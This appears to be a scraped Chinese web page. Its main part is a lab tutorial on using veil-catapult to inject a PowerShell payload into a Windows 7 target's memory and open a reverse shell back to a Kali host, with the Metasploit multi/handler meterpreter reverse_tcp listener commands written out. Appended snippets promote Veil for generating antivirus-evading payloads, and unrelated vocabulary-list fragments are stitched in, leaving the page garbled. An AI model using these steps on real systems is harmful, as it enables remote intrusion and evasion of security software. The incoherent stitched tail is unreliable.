veil-catapult

veil-catapult进行payload投放,直接使payload在内存中执行。

powershell工作原理:从kali先发一个powershell脚本到目标主机上,再发一个反弹shell到目标主机,再发一个指令给powershell,powershell通知反弹shell连接kali,之后就建立连接了

缺点:兼容性较差

kaliIP:192.168.1.119

目标IP:192.168.1.121

通常选1、2,如果使用标准的payload就选1,已经想使用自己的payload就选2。

这里选1

先生成powershell

选1

在win7上是有powershell的运行环境的,直接在运行输入powershell

设置IP,目标用户名密码,执行形式

回车

生成反弹shell的payload

选1

设置反弹的IP,端口

然后就生成好了,生成的payload并没有保存到本地,而是存在内存中,回车注入到目标主机的内存中,使目标主机反弹连接到kali

但是kali并没有打开侦听,所以并没有连接成功,所以我们先打开msf的侦听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

设置反弹的IP,和端口,以线程的注入方式

set lport 4444

set lhost 192.168.1.119

set EXITFUNC thread

show options

exploit执行侦听

msf执行侦听后,再对目标按照以上步骤进行payload投放

时间: 2024-10-25 02:42:58

veil-catapult的相关文章

Kali-linux免杀Payload生成工具Veil

Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件.本节将介绍Veil工具的安装及使用. 在Kali Linux中,默认没有安装Veil工具.这里首先安装Veil工具,执行如下所示的命令: [email protected]:~# apt-get install veil 执行以上命令后,如果安装过程没有提示错误的话,则表示Veil工具安装成功.由于安装该工具依赖的软件较多,所以此过程时间有点长. 启动Veil工具.执行命令如下所

Kail Linux渗透测试教程之免杀Payload生成工具Veil

Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件.本节将介绍Veil工具的安装及使用. 在Kali Linux中,默认没有安装Veil工具.这里首先安装Veil工具,执行如下所示的命令: root@kali :~# apt-get update &&am

Veil—绕过杀毒软件的payload生成器 -中国寒龙

程序截图: 注意:请不要作坏事,不要向VirusTotal提交任何payload 在几乎所有的评估中,渗透测试人员必须与杀毒软件做斗争.每次斗争的水准依赖于杀毒软件的解决方案以及其定义等.在过去的半年中,我着手于研究如何绕过杀毒软件.两月前,仔细回顾了一下自己最近的研究,以使其更加有用.下面是我设定的一些目标: ·绕过在大多数网络环境下能遇到的杀毒软件 ·利用Metasploit兼容的payload,在后期版本中进行扩展 ·尽可能的使每个payload文件随机化 设定这些目标后,就继续研究绕过杀

彩笔安装 veil 的过程

链接: http://pan.baidu.com/s/1eQ8aMem 密码: suox 将need.tar.gz 里的东西放到steup里面 #!/bin/bash # Global Variables runuser=$(whoami) tempdir=$(pwd) # Title Function func_title(){ # Clear (For Prettyness) clear # Echo Title echo '=================================

Veil:免杀payload生成工具

http://xiao106347.blog.163.com/blog/static/215992078201310223233644/ 下载安装 git clone https://github.com/veil-evasion/Veil.git   cd Veil/setup/   ./setup.sh 也可以下载zip包,然后解压安装:https://github.com/veil-evasion/Veil 一路回车: 安装之后cd到当前的Veil目录里运行Veil.py(这样就是最新版v

根据76大细分词性对单词进行归组(二)

词性的重要性不言而喻,尤其是对于自然语言处理来说,哪怕就是记单词,根据词性对单词进行归组也是非常有帮助的. superword是一个Java实现的英文单词分析软件,主要研究英语单词音近形似转化规律.前缀后缀规律.词之间的相似性规律等等. 各大词性及其包括的词: 32.N-COUNT-COLL(可数集合名词) (词数:50) 1 aristocracy army array audience band 2 cast chapter command commission committee 3 co

词组习语3057组

superword是一个Java实现的英文单词分析软件,主要研究英语单词音近形似转化规律.前缀后缀规律.词之间的相似性规律等等. 1 Anointing of the Sick British English 2 Civvy Street Clerk of the Closet 3 I mean I must say 4 I suppose so I will thank you to do something 5 Incoming mail server Lithium battery 6 M

利用烧鹅制作简单BadUSB,插谁谁怀孕

所用硬件设备为烧鹅,烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板. 使用veil编码meterpreter生成payload(经过编码的payload在杀软中仅能够存活几分钟),放到服务器上.插入烧鹅,模拟键盘输入,在cmd中下载payload,并执行. Github:https://github.com/RadioWar/FireGoose 0x1 利用veil编码打造免杀的meterpreter  [email 

Random Forest Classification of Mushrooms

There is a plethora of classification algorithms available to people who have a bit of coding experience and a set of data. A common machine learning method is the random forest, which is a good place to start. This is a use case in R of the randomFo

Vocabulary

A ANSI    美国国家标准学会,American National Standards Institute的缩写 a couple of    [口语]少数的,几个 a set of    一套:一组:一副 abbreviation    [?,bri:vi'ei??n]    n.    缩写:缩短:节略缩写,缩短的事实(或状况) abnormal    [?b'n?:m?l]    adj.    反常的,不正常的:异常的:不规则的 absence    ['?bs?ns]    n.